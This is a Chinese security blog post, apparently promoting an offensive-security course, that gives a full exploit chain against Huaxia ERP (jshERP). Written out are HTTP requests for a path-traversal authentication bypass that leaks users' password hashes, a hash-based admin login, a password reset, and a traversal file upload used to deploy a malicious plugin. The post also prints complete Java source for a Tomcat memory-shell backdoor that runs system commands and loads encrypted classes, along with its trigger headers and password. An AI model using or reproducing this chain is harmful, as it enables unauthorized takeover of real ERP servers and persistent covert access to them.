华夏ERP全版本未授权RCE及内存马注入

免责声明： 由于传播、利用本公众号李白你好所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号李白你好及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！

1 ►

前言

华夏ERP全版本未授权RCE及内存马注入。本文来自 《实战攻防》课程开源应用渗透利用篇 。作者： xiuxian

点击下文了解详情👇

[

实战攻防&&实战渗透强势来袭](http://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247508089&idx=1&sn=4f3d53f35bab2db99151fda0348a2e59&chksm=c09ad329f7ed5a3f18cebbd76343cc6c0043ba9cec01aa30ce0faee43fbc6ebd8d3d0b18d6e5&scene=21#wechat_redirect)

2 ►

权限绕过

目前最新版V3.3

1GET/jshERP-boot/platformConfig/getPlatform/..;/..;/..;/jshERP-boot/user/getAllList HTTP/1.1

通过getAllList读取用户名，密码MD5值。

Hash登录

使用读取得密码MD5值登录超级管理员后台。

1POST /jshERP-boot/user/login HTTP/1.1
2Host: IP
3Content-Length: 67
4Accept: application/json, text/plain, */*
5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
6Content-Type: application/json;charset=UTF-8
7Origin: http://172.20.10.3:3000
8Referer: http://172.20.10.3:3000/user/login
9Accept-Encoding: gzip, deflate
10Accept-Language: zh-CN,zh;q=0.9
11Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1724134392; HMACCOUNT=4FC1696FCCBA0C17; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1724138837
12Connection: close
13
14
15{"loginName":"admin","password":"e10adc3949ba59abbe56e057f20f883e"}

权限绕过重置用户密码

1/jshERP-boot/platformConfig/getPlatform/..;/..;/..;/jshERP-boot/user/resetPwd
2
3
4{"id":63}

3 ►

后台利用

超级管理员用户登陆后使用uploadPluginConfigFile接口创建../plugin目录，此目录创建后可部署插件。

1POST /jshERP-boot/plugin/uploadPluginConfigFile HTTP/1.1
2Host: 172.20.10.3:3000
3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
4Accept: */*
5Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6Accept-Encoding: gzip, deflate
7X-Requested-With: XMLHttpRequest
8Content-Type: multipart/form-data; boundary=---------------------------64343665641219398361207370473
9X-Access-Token: 90777cf909864636a458b05de1eab2a9_0
10Content-Length: 247
11
12
13
14
15-----------------------------64343665641219398361207370473
16Content-Disposition: form-data; name="configFile"; filename="../plugins/success.txt"
17Content-Type: text/plain
18
19
20success
21
22
23-----------------------------64343665641219398361207370473--

后台上传插件

编写springboot-plugin-framework-parent插件。

1https://gitee.com/xiongyi01/springboot-plugin-framework-parent

内存马注入利用

编写冰蝎监听器，部署插件注入内存马。

1package ysoserial.payloads.templates;
2
3
4import com.sun.jmx.mbeanserver.NamedObject;
5import com.sun.jmx.mbeanserver.Repository;
6import com.sun.org.apache.xalan.internal.xsltc.DOM;
7import com.sun.org.apache.xalan.internal.xsltc.TransletException;
8import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
9import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
10import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
11import org.apache.catalina.connector.Request;
12import org.apache.catalina.connector.RequestFacade;
13import org.apache.catalina.connector.Response;
14import org.apache.catalina.core.StandardContext;
15import org.apache.tomcat.util.modeler.Registry;
16
17
18import javax.crypto.Cipher;
19import javax.crypto.spec.SecretKeySpec;
20import javax.management.DynamicMBean;
21import javax.management.MBeanServer;
22import javax.management.ObjectName;
23import javax.servlet.ServletRequestEvent;
24import javax.servlet.ServletRequestListener;
25import javax.servlet.http.HttpSession;
26import java.lang.reflect.Field;
27import java.lang.reflect.Method;
28import java.util.HashMap;
29import java.util.Scanner;
30import java.util.Set;
31
32
33public class TomcatListenerMemShellFromJMX extends AbstractTranslet implements ServletRequestListener {
34    static {
35        try {
36            MBeanServer mbeanServer = Registry.getRegistry(null, null).getMBeanServer();
37            Field field = Class.forName("com.sun.jmx.mbeanserver.JmxMBeanServer").getDeclaredField("mbsInterceptor");
38            field.setAccessible(true);
39            Object obj = field.get(mbeanServer);
40
41
42            field = Class.forName("com.sun.jmx.interceptor.DefaultMBeanServerInterceptor").getDeclaredField("repository");
43            field.setAccessible(true);
44            Repository repository = (Repository) field.get(obj);
45
46
47            Set<NamedObject> objectSet = repository.query(new ObjectName("Catalina:host=localhost,name=NonLoginAuthenticator,type=Valve,*"), null);
48            if (objectSet.size() == 0) {
49                // springboot的jmx中为Tomcat而非Catalina
50                objectSet = repository.query(new ObjectName("Tomcat:host=localhost,name=NonLoginAuthenticator,type=Valve,*"), null);
51            }
52
53
54            for (NamedObject namedObject : objectSet) {
55                DynamicMBean dynamicMBean = namedObject.getObject();
56                field = Class.forName("org.apache.tomcat.util.modeler.BaseModelMBean").getDeclaredField("resource");
57                field.setAccessible(true);
58                obj = field.get(dynamicMBean);
59
60
61                field = Class.forName("org.apache.catalina.authenticator.AuthenticatorBase").getDeclaredField("context");
62                field.setAccessible(true);
63                StandardContext standardContext = (StandardContext) field.get(obj);
64
65
66                TomcatListenerMemShellFromJMX listener = new TomcatListenerMemShellFromJMX();
67                standardContext.addApplicationEventListener(listener);
68            }
69        } catch (Exception e) {
70//            e.printStackTrace();
71        }
72    }
73
74
75    @Override
76    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
77
78
79    }
80
81
82    @Override
83    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
84
85
86    }
87
88
89    @Override
90    public void requestDestroyed(ServletRequestEvent servletRequestEvent) {
91
92
93    }
94
95
96    @Override
97    public void requestInitialized(ServletRequestEvent servletRequestEvent) {
98// Listener马没有包装类问题
99        try {
100            RequestFacade requestFacade = (RequestFacade) servletRequestEvent.getServletRequest();
101            Field f = requestFacade.getClass().getDeclaredField("request");
102            f.setAccessible(true);
103            Request request = (Request) f.get(requestFacade);
104            Response response = request.getResponse();
105            // 入口
106            if (request.getHeader("Referer").equalsIgnoreCase("https://www.google.com/")) {
107                // cmdshell
108                if (request.getHeader("x-client-data").equalsIgnoreCase("cmd")) {
109                    String cmd = request.getHeader("cmd");
110                    if (cmd != null && !cmd.isEmpty()) {
111                        String[] cmds = null;
112                        if (System.getProperty("os.name").toLowerCase().contains("win")) {
113                            cmds = new String[]{"cmd", "/c", cmd};
114                        } else {
115                            cmds = new String[]{"/bin/bash", "-c", cmd};
116                        }
117                        String result = new Scanner(Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();
118                        response.resetBuffer();
119                        response.getWriter().println(result);
120                        response.flushBuffer();
121                        response.finishResponse();
122                    }
123                } else if (request.getHeader("x-client-data").equalsIgnoreCase("rebeyond")) {
124                    if (request.getMethod().equals("POST")) {
125                        // 创建pageContext
126                        HashMap pageContext = new HashMap();
127
128
129                        // lastRequest的session是没有被包装的session!!
130                        HttpSession session = request.getSession();
131                        pageContext.put("request", request);
132                        pageContext.put("response", response);
133                        pageContext.put("session", session);
134                        // 这里判断payload是否为空 因为在springboot2.6.3测试时request.getReader().readLine()可以获取到而采取拼接的话为空字符串
135                        String payload = request.getReader().readLine();
136
137
138//                        System.out.println(payload);
139                        // 冰蝎逻辑
140                        String k = "e45e329feb5d925b"; // rebeyond
141                        session.putValue("u", k);
142                        Cipher c = Cipher.getInstance("AES");
143                        c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
144                        Method method = Class.forName("java.lang.ClassLoader").getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
145                        method.setAccessible(true);
146                        byte[] evilclass_byte = c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(payload));
147                        Class evilclass = (Class) method.invoke(Thread.currentThread().getContextClassLoader(), evilclass_byte, 0, evilclass_byte.length);
148                        evilclass.newInstance().equals(pageContext);
149                    }
150                } else {
151                    response.resetBuffer();
152                    response.getWriter().println("error");
153                    response.flushBuffer();
154                    response.finishResponse();
155                }
156            }
157        } catch (Exception e) {
158//            e.printStackTrace();
159        }
160    }
161}

插件启动，new一个冰蝎监听马。

上传插件连接内存马

1密码：rebeyond
2
3
4Referer: https://www.google.com/
5x-client-data: rebeyond

华夏ERP漏洞利用一键化工具-实战攻防课程内部专版，报名课程免费获取

4 ►

往期精彩

[

Telegram“电报”创始人在法国被捕](http://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247508282&idx=1&sn=21d8a364bced74f65d08823f0ffb97bb&chksm=c09ad26af7ed5b7ccb8859125fba0ed31d4dd0f0c94c7676fb53d525c039b9dd635d472a8ea0&scene=21#wechat_redirect)

[

攻防渗透&&《黑神话·悟空》\*2份，速来抽奖！](http://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247508235&idx=1&sn=5043590d457c5ec778258499582ca04d&chksm=c09ad25bf7ed5b4d12bcd6e140d6a2ef8147894a95d6e3dd0ae6e3c9cfe35dff3925b912b8f2&scene=21#wechat_redirect)

[

这回真的是“降本增笑”了](http://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247508203&idx=1&sn=71dfb39d9a6f4a7a809f96c2a4fd7727&chksm=c09ad3bbf7ed5aad13168b2eda656e6d691bf12f094d3169c5a323a320df48f94e9e5b01aae8&scene=21#wechat_redirect)